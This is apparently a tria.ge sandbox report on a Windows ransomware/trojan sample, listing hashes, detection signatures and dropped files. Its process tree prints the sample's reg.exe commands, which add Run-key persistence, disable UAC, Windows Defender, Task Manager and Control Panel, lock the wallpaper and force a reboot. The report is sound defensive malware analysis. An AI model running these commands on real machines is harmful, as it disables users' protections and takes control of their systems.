Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

240204-b61b1seff6.exe

windows7-x64

240204-b61b1seff6.exe

windows10-2004-x64

Analysis

  • max time kernel
    41s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    04/02/2024, 05:51

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    240204-b61b1seff6.exe

  • Size

    11.5MB

  • MD5

    cbefa3dd01682c7ae01476a35c069ca8

  • SHA1

    0a7fde7402d314993d0b77b87b796f480c8bbec4

  • SHA256

    9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

  • SHA512

    41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d

  • SSDEEP

    196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Score
10/10
evasionpersistenceransomwaretrojanupx

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs
  • UPX dump on OEP (original entry point) 3 IoCs
  • Disables Task Manager via registry modification
    evasion
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Windows directory 6 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe
    "C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\HorrorTubies.bat""
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:2788
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:2608
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:1252
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:2652
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:1204
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:1224
        • C:\Windows\SysWOW64\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          3⤵
            PID:2572
          • C:\Windows\SysWOW64\reg.exe
            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:1952
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
            3⤵
              PID:320
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown /r /t 00
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2900
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x0
          1⤵
            PID:2684
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x1
            1⤵
              PID:692

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\HorrorTubies.bat
              Filesize

              1KB

              MD5

              f014698e88eda534c88ce46a17e34d3c

              SHA1

              5f33f606179fea1404144d60af54fb829ea108b5

              SHA256

              35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909

              SHA512

              79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\bg.bmp
              Filesize

              2.2MB

              MD5

              a91e5b7686d4f631a2bdf654a3a491f1

              SHA1

              d5760f5c7463b588b0c74bbc86237aed136b9fe9

              SHA256

              45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea

              SHA512

              86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\gdifuncs.exe
              Filesize

              76KB

              MD5

              9b104d42649fa52651a2ec25d7e48322

              SHA1

              d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030

              SHA256

              23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9

              SHA512

              55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\mainbgtheme.wav
              Filesize

              13.1MB

              MD5

              1c723b3b9420e04cb8845af8b62a37fa

              SHA1

              3331a0f04c851194405eb9a9ff49c76bfa3d4db0

              SHA256

              6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29

              SHA512

              41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\mbrsetup.exe
              Filesize

              1.3MB

              MD5

              4f9777b4f603a437abedb856d09d42ba

              SHA1

              9a50bdb720e937ae6a8fd4140233b600414b393e

              SHA256

              c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd

              SHA512

              c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

              Download Submit

            • memory/692-36-0x0000000002760000-0x0000000002761000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1104-0-0x0000000000400000-0x00000000014D1000-memory.dmp

              Filesize

              16.8MB

              Download

            • memory/1104-19-0x0000000000400000-0x00000000014D1000-memory.dmp

              Filesize

              16.8MB

              Download

            • memory/1104-34-0x0000000000400000-0x00000000014D1000-memory.dmp

              Filesize

              16.8MB

              Download

            • memory/2684-35-0x0000000002B00000-0x0000000002B01000-memory.dmp

              Filesize

              4KB

              Download